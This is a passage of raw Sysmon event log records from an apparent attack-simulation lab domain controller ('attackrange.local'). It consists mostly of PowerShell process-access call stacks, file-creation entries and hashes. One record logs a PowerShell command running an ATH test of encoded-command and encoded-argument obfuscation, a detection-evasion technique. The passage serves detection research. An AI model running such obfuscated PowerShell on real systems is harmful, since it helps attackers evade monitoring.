icrosoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001698075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.246{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001698074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.240{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001698073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.240{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001698072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.213{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=38A5E1A89FBCA9561C859ED0C6522C8D,SHA256=DD2C73D802DE0F16969F721908BFF131A14368115FCD3B262D54502BCB62AC6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001698071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.177{05ADC7E1-229F-6039-1600-00000000AD01}15407320C:\Windows\system32\svchost.exe{05ADC7E1-70F4-603D-8488-00000000AD01}8564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.177{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70F4-603D-8488-00000000AD01}8564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001698069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.146{05ADC7E1-70F4-603D-8188-00000000AD01}3124ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001698068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.124{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F4-603D-8488-00000000AD01}8564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.124{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F4-603D-8488-00000000AD01}8564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001698066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:55:49.122{05ADC7E1-70F4-603D-8488-00000000AD01}8564\PSHost.132591129489920824.8564.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001698065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.099{05ADC7E1-70F4-603D-8488-00000000AD01}8564ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vzjydcnu.p2v.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.099{05ADC7E1-70F4-603D-8488-00000000AD01}8564ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_v55pjrux.sa3.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.099{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA53AAC7E819D4D7953D9063E85D698F,SHA256=18153E421FF297E7442542FB7CFBE43A667438578FAA15016309B5904FD55285,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001698062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.083{05ADC7E1-70F4-603D-8488-00000000AD01}8564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_v55pjrux.sa3.ps12021-03-01 22:55:49.083 10341000x80000000000000001698061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F4-603D-8588-00000000AD01}6764C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F4-603D-8488-00000000AD01}8564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System